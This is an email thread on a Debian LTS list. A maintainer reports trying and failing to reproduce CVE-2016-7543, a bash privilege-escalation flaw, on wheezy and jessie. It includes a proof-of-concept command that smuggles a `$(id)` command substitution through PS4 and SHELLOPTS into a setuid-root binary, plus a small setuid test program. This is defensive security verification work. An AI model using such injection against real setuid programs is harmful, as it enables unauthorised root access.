Hi Matthias and Balint
I have tried to reproduce the problem described in the openwall email.
However I can not reproduce it. Have you been able to?
On wheezy:
------------
ola@tigereye:/$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
Thu Oct 6 20:54:07 UTC 2016
ola@tigereye:/$ ls -la test
-rwsr-xr-x 1 root root 6824 Oct 6 20:52 test
ola@tigereye:/$ dpkg -l bash
...CUT...
ii bash 4.2+dfsg-0.1 amd64 GNU Bourne Again SHell
On jessie:
ola@tigereye:~/exploit$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
Thu Oct 6 22:48:35 CEST 2016
ola@tigereye:~/exploit$ dpkg -l bash
...CUT...
ii bash 4.3-11+b1 amd64 GNU Bourne Again SHell
I think it may be because SHELLOPTS is a read-only variable.
ola@tigereye:~/exploit$ SHELLOPTS=xtrace
bash: SHELLOPTS: readonly variable
Do you think I have made a mistake in the reproduction or is it so that the
patch was actually not on a real problem (at least in Debian).
Not even if I change the code like this:
ola@tigereye:~/exploit$ gcc -xc - -otest2 <<< 'int main() { setuid(0);
system("/bin/bash -c /bin/date"); }'
ola@tigereye:~/exploit$ ./test2
Thu Oct 6 23:04:11 CEST 2016
ola@tigereye:~/exploit$ set -x
ola@tigereye:~/exploit$ ./test2
uid=1000(ola) gid=1000(ola)
groups=1000(ola),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)./test2
Thu Oct 6 23:04:18 CEST 2016
My conclusion is that there is no security hole. But I may be mistaken.
Can anyone else reproduce the issue?
Best regards,
// Ola
On 6 October 2016 at 12:29, Ola Lundqvist <[email protected]> wrote:
> Hi Matthias
>
> I will look into this.
>
> // Ola
>
> On 6 October 2016 at 01:06, Matthias Klose <[email protected]> wrote:
>
>> On 05.10.2016 16:02, Balint Reczey wrote:
>> > Hello dear maintainer(s),
>> >
>> > the Debian LTS team would like to fix the security issues which are
>> > currently open in the Wheezy version of bash:
>> > https://security-tracker.debian.org/tracker/CVE-2016-7543
>> >
>> > Would you like to take care of this yourself?
>>
>> please go ahead.
>>
>> Matthias
>>
>>
>
>
> --
> --- Inguza Technology AB --- MSc in Information Technology ----
> / [email protected] Folkebogatan 26 \
> | [email protected] 654 68 KARLSTAD |
> | http://inguza.com/ Mobile: +46 (0)70-332 1551 |
> \ gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9 /
> ---------------------------------------------------------------
>
>
--
--- Inguza Technology AB --- MSc in Information Technology ----
/ [email protected] Folkebogatan 26 \
| [email protected] 654 68 KARLSTAD |
| http://inguza.com/ Mobile: +46 (0)70-332 1551 |
\ gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9 /
---------------------------------------------------------------
